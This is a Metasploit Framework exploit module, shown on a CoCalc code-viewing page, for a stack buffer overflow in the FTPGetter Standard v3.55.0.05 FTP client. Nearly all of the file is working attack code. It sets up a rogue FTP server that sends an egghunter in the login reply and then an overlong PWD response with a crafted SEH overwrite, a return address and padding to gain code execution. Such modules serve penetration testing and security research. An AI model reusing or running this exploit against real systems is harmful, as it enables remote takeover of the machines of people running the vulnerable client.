Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb
23880 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::FtpServer

10
  include Msf::Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)',

17
        'Description' => %q{

18
          This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.

19
          When processing the response on a PWD command, a stack based buffer overflow occurs.

20
          This leads to arbitrary code execution when a structured exception handler gets

21
          overwritten.

22
        },

23
        'Author' => [

24
          'ekse',	# found the bug

25
          'corelanc0d3r <peter.ve[at]corelan.be>',	#  wrote the exploit

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'CVE', '2019-9760' ],

30
          [ 'OSVDB', '68638'],

31
          [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],

32
        ],

33
        'DefaultOptions' => {

34
          'EXITFUNC' => 'thread',

35
        },

36
        'Payload' => {

37
          'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [ 'XP SP3 Universal', { 'Offset' => 485, 'Ret' => 0x100139E5 } ], # ppr [ssleay32.dll]

42
        ],

43
        'Privileged' => false,

44
        'DisclosureDate' => '2010-10-12',

45
        'DefaultTarget' => 0,

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53
  end

54


55
  def setup

56
    super

57
    badchars = ""

58
    eggoptions =

59
      {

60
        :checksum => true,

61
        :eggtag => "W00T"

62
      }

63
    @hunter, @egg = generate_egghunter(payload.encoded, badchars, eggoptions)

64
  end

65


66
  def on_client_unknown_command(c, cmd, arg)

67
    c.put("200 OK\r\n")

68
  end

69


70
  def on_client_command_pass(c, arg)

71
    @state[c][:pass] = arg

72
    c.put("230 OK #{@egg}\r\n")

73
    return

74
  end

75


76
  def on_client_command_pwd(c, arg)

77
    junk1 = "A" * target['Offset']

78
    junk2 = "A" * 9

79
    nseh = "\x74\x06\x41\x41"

80
    jmp = "\x75\x08"

81
    seh = [target.ret].pack('V')

82
    junk3 = "D" * 22000

83
    # dual offset

84
    buffer = junk1 + nseh + seh + junk2 + jmp + nseh + seh + @hunter + junk3

85
    c.put("257 \"/\" #{buffer}\r\n")

86
    print_status("Sent payload, #{buffer.length} bytes")

87
    print_status("Wait for hunter ...")

88
    return

89
  end

90
end

91


92